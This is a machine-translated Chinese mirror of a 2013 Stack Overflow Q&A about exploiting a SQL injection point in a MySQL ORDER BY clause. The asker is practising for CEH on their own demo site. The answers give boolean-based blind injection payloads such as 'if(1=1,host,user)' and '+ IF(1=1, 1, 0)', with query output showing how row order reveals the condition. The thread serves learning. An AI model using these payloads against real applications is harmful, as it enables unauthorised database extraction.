文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布
首页
学习
活动
专区
圈层
工具
MCP广场
返回腾讯云官网
社区首页 >问答首页 >创建用于盲SQL注入的查询

创建用于盲SQL注入的查询
EN

Stack Overflow用户
提问于 2013-06-22 23:42:33
回答 2查看 843关注 0票数 0

我发现我的一个演示网站容易受到SQL注入的攻击(我目前正在做CEH)

发现的注入点如下:

代码语言:javascript
运行
复制
SELECT column_1,column_2,column_3 from table_1 where column_4='3' order by id [*INJECTION POINT FOUND HERE*]

现在我需要制作一些东西来帮助我利用我发现的这个注入点。据我所知,联合选择不会在ORDER BY之后工作。但是,我确实认为盲目sql注入可能如下所示

代码语言:javascript
运行
复制
SELECT column_1,column_2,column_3 from table_1 where column_4='3' order by id [if 1=1 then 1,blank]

现在,如果在注入点发布1,则查询会给出错误,而如果将其保留为空,则查询将execute...THUS盲SQL注入将起作用

有没有人可以帮我用IF THEN ELSESQL中创建一个查询,因为我不知道如何在SQL中使用IF THEN ELSE

已尝试注入此程序,但不起作用

(IF (1=2) then 1 endif)

完整查询

代码语言:javascript
运行
复制
SELECT  column_1, column_2, column_3  from `table_1`  WHERE   `column_4` = '[*available injection point*]'  order by id [*available injection point*] ASC  limit [*available injection point*],[*available injection point*]
mysql
sql-injection
EN

回答 2

Stack Overflow用户

回答已采纳

发布于 2013-06-23 02:15:28

如果id在结果集中不是唯一的,并且有另一列的值在每个id中是唯一的,则可以执行以下操作:

  1. 使用, unique_per_id标识唯一的per ID值的顺序(必须仅与id不同,如果可以通过, IF(1=1,unique_per_id,id).

进行necessary).

  • Boolean-based盲插入,请在id上使用desc

示例:

代码语言:javascript
运行
复制
mysql> select host,user from mysql.user order by user;
+-----------+------------------+
| host      | user             |
+-----------+------------------+
| localhost | root             |
| 127.0.0.1 | root             |
+-----------+------------------+
2 rows in set (0.00 sec)

mysql> select host,user from mysql.user order by user,host;
+-----------+------------------+
| host      | user             |
+-----------+------------------+
| 127.0.0.1 | root             |
| localhost | root             |
+-----------+------------------+
2 rows in set (0.00 sec)

mysql> select host,user from mysql.user order by user,if(1=1,host,user);
+-----------+------------------+
| host      | user             |
+-----------+------------------+
| 127.0.0.1 | root             |
| localhost | root             |
+-----------+------------------+
2 rows in set (0.00 sec)

mysql> select host,user from mysql.user order by user,if(1=0,host,user);
+-----------+------------------+
| host      | user             |
+-----------+------------------+
| localhost | root             |
| 127.0.0.1 | root             |
+-----------+------------------+
2 rows in set (0.00 sec)

因此,只要结果集使用if(expr,host,user)的顺序与只使用host (第二个查询)的顺序相同,条件expr就为真。

票数 0
EN

Stack Overflow用户

发布于 2013-06-23 01:45:40

您可以注入:

代码语言:javascript
运行
复制
+ IF(1=1, 1, 0)

生成的查询将是:

代码语言:javascript
运行
复制
SELECT column_1,column_2,column_3
from table_1 
where column_4='3'
order by id + IF(1=1, 1, 0)
票数 -1
EN
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://stackoverflow.com/questions/17252442

复制
相关文章

相似问题

领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档